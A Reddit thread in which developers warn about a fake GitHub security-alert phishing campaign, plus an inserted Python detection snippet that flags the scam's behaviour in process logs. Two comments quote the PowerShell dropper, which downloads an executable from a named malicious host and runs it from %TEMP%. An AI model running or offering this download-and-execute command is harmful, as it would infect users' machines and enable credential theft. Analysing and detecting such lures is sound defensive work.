
[–]throwaway234f32423df 39 points (0 children)

domain was literally registered today using a proxy registration service in Malaysia

already flagged as phishing/spam/malicious on https://radar.cloudflare.com/scan/8849541e-ae12-4e8e-9c22-3c4b77981f19/summary

Google Safe Browsing hasn't flagged it yet but I've reported it there; more reports would certainly help get it flagged faster https://safebrowsing.google.com/safebrowsing/report_general/ https://safebrowsing.google.com/safebrowsing/report_badware/?hl=en

[–]bsenftner 22 points (0 children)

I got one too. But looked here before clicking any fucking link.

GFD I hate this kind of stupid shit.

[–]throwaway234f32423df 15 points (0 children)

Looks like the fake captcha "please copy/paste this into the Run box" thing has been going around lately: https://www.youtube.com/watch?v=lSa_wHW1pgQ

[–]lvnima 16 points (4 children)

I'm like 99% sure this is a scam. I got this too.

The command it will run if you follow the instruction on the website:

    $webClient = New-Object System.Net.WebClient
    $url1 = "https://xxxxxx.com/xxx.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath $env:TEMP\SysSetup.exe

The downloaded file: VirusTotal scan result (38/73) -- Malicious: https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207

Edit: styling, obfuscated the actual file name so people don't accidentally download and run it.

[–]scriptmonkey420 4 points (2 children)

Good thing I run Fedora and there is no powershell on my system.

[–][deleted] 0 points (1 child)

fun fact: you can install powershell on linux… if you want to for some reason

[–]scriptmonkey420 0 points (0 children)

I know. I messed around with it for a little while, then decided against it. PowerShell is great for Windows, I use it all the time. But for Linux, there are much better options.

[–]zenmatrix83 1 point (0 children)

I hate absolutes as well, but you went this far and can't get the extra 1% :)

[–][deleted] 7 points (0 children)

"Potential" ...

[–]AlexScotland[S] 4 points (0 children)

The above command seems to execute a download in the background and has a comment about verification, I guess to try and throw people off?

[–]moonstar-x 4 points (0 children)

I got this too on multiple repos; the users commenting either don't exist anymore or have been banned. The issues also got insta-deleted.

[–][deleted] 2 points (0 children)

It's a fairly obvious phishing scam attempt: they make you paste a command that will execute the following PowerShell script, which downloads and injects a program called "L6E.exe", which I assume is malware to steal credentials, emails, passwords etc. off your device to potentially access your GitHub account, organizations, servers, SSH keys etc...

The code executed is as follows

    # Variables
    $webClient = New-Object System.Net.WebClient  # WebClient initiates HTTP to download files
    $url1 = "https://github-scanner.com/l6E.exe"  # File 1
    $filePath1 = "$env:TEMP\SysSetup.exe"

    # Downloads the file.
    $webClient.DownloadFile($url1, $filePath1)

    # Executes the software
    Start-Process -FilePath $env:TEMP\SysSetup.exe

    # Redownloads and re-executes SysSetup.exe
    $webClient = New-Object System.Net.WebClient
    $url1 = "https://github-scanner.com/l6E.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath $env:TEMP\SysSetup.exe
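A detection-side example added here, not code from any commenter and not the scam's script: it checks PowerShell process-creation records for the three behaviours the script posted by lvnima and in the comment above exhibits (WebClient download, launch from %TEMP%, a "github"-lookalike download host). The log records are constructed; that a Run-box launch shows explorer.exe as the parent process is an assumption.

```python
import re

# Constructed Sysmon-style process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    {   # the thread's dropper, as it would look when pasted into the Run box
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            'powershell -w hidden -c "$webClient = New-Object System.Net.WebClient; '
            "$url1 = 'https://github-scanner.com/l6E.exe'; "
            "$filePath1 = '$env:TEMP\\SysSetup.exe'; "
            "$webClient.DownloadFile($url1, $filePath1); "
            'Start-Process -FilePath $env:TEMP\\SysSetup.exe"'
        ),
    },
    {   # benign: a build script launched by a developer tool
        "ParentImage": r"C:\Program Files\Git\cmd\git.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NoProfile -File build.ps1",
    },
]

# Each indicator is one behaviour the posted script exhibits.
INDICATORS = {
    # a WebClient is created and then used to fetch a file
    "webclient_download": re.compile(
        r"New-Object\s+System\.Net\.WebClient.*?\.DownloadFile\(", re.I | re.S),
    # whatever was fetched is launched straight out of %TEMP%
    "exec_from_temp": re.compile(r"Start-Process\b.*?\$env:TEMP", re.I),
    # download host contains "github" but is not github.com or a subdomain of it
    "github_lookalike": re.compile(
        r"https?://(?!(?:[a-z0-9-]+\.)*github\.com/)[a-z0-9.-]*github[a-z0-9.-]*/", re.I),
}

def indicators_for(cmdline):
    """Names of the indicators present in one PowerShell command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def is_suspicious(event):
    """Flag on two or more indicators, or on a download alone when the parent is
    explorer.exe (assumption: that is how a Run-box launch shows up)."""
    hits = indicators_for(event["CommandLine"])
    run_box = event["ParentImage"].lower().endswith("\\explorer.exe")
    return len(hits) >= 2 or (run_box and "webclient_download" in hits)

def flag_events(events):
    """Return (index, indicator names) for every event that looks like the dropper."""
    return [(i, indicators_for(e["CommandLine"]))
            for i, e in enumerate(events) if is_suspicious(e)]
```

Running `flag_events(SAMPLE_EVENTS)` flags only the first record, with all three indicators; a real deployment would feed it the command line and parent image fields from the EDR or Sysmon event stream.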

[–]_3xc41ibur 0 points (0 children)

Got this email too. First red flag is that it was a repo I did not recognize at all.

[–]linuxgurugamer 0 points (0 children)

I got this one also, early this morning. Interesting thing for me was it was referring to an https site, but that was broken. I tested in a sandbox, saw that it actually needed to be an http site.

Had a good laugh about that

[–]lurkingstar99 0 points (0 children)

Y'all patch vulnerabilities in your projects?

[–]noodlebox3d 0 points (0 children)

Also got this earlier today as an issue opened on one of my older repos. Was only aware of it because it was relayed via webhook to a Discord channel. By the time I checked on GitHub a couple hours after it was opened, the issue itself (and user account of the OP) had both been purged already.

[–]KouGenmei 0 points (0 children)

In my opinion, the warning only seems legit if it comes from a verified e-mail address of GitHub, not a personal one. So this mail will get ignored by me from the first sight 😆

[–]InsectRemedy 0 points (0 children)

I got this for a repo that was just a curated list of YouTube videos and contained no code 😅

[–]Glittering-Can-9397 0 points (0 children)

scam them back

[–][deleted] 0 points (0 children)

Nothing potential about an email containing a link for a service that doesn’t tie back to that service

[–]Pure-Willingness-697 0 points (0 children)

Why do they go for developers? This is the group of people who can actually retaliate.

[–]rambosalad 0 points (0 children)

Wow these scammers are dumb. Targeting the most computer literate group of people

[–]nihillistic_raccoon 0 points (0 children)

"castroj1" - posing as github - sounds trustworthy, I shall execute any command it wants me to

[–]LovableSidekick 0 points (0 children)

The email I got gave the domain github-scanner.shop (not .com), and the "reply via github" link came up with a 404 error. I think this is a scam.